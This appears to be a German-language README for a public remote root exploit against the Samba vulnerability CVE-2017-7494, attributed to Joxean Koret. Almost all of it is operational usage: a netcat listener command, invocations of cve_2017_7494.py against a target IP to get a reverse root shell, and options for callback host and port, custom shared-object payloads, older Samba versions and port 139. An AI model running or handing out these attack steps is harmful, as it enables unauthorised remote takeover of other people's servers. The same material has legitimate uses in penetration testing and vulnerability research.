
Remote root exploit for the SAMBA CVE-2017-7494 vulnerability
Remote Root-Exploit für die SAMBA-Sicherheitslücke CVE-2017-7494.
Dieses Exploit besteht aus 2 Teilen:
Solange das Ziel verwundbar ist und der Payload für das Zielbetriebssystem und die Architektur korrekt ist, ist das Exploit zu 100 % zuverlässig.
Führen Sie auf Ihrem Rechner den folgenden Befehl aus:
$ nc -p 31337 -l
Führen Sie dann das Exploit gegen Ihr Ziel aus und warten Sie, bis es sich wieder mit Ihrem Netcat verbindet:
$ python cve_2017_7494.py -t ziel_ip
Wenn Sie die Reverse Shell zu schnell schließen, können Sie das Exploit erneut ausführen, anstatt das Modul erneut hochzuladen usw., indem Sie einfach den Pfad zu dem bereits hochgeladenen Modul angeben. Angenommen, es wurde unter /shared/directory/ als "module.so" hochgeladen, würden Sie einen Befehl wie den folgenden ausführen:
$ python cve_2017_7494.py -t ziel_ip -m /shared/directory/module.so
Sie können das Exploit nun auch gegen Samba 3.5.0 und 3.6.0 ausführen, indem Sie einfach das Argument -o 1 hinzufügen.
python cve_2017_7494.py -t ziel_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Sie können jetzt auch Ihre eigene benutzerdefinierte .so-Datei verwenden.
python cve_2017_7494.py -t ziel_ip -u test -P 123456 -o 1 --custom myso.so
Falls Sie dieses Skript von einer x86-Maschine aus ausführen müssen, erstellt die Kompilierung der Implant-Binärdateien zwei x86-Dateien. Mit dem Flag -n 1 können Sie die Kompilierung deaktivieren und die libimplantx64.so von einem anderen Rechner kopieren.
python cve_2017_7494.py -t ziel_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Falls Samba nur auf Port 139 läuft, können Sie den Remote-Server-Port mit dem Argument -p festlegen.
python cve_2017_7494.py -t ziel_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Ich unterstütze es nicht mehr.
-- Joxean Koret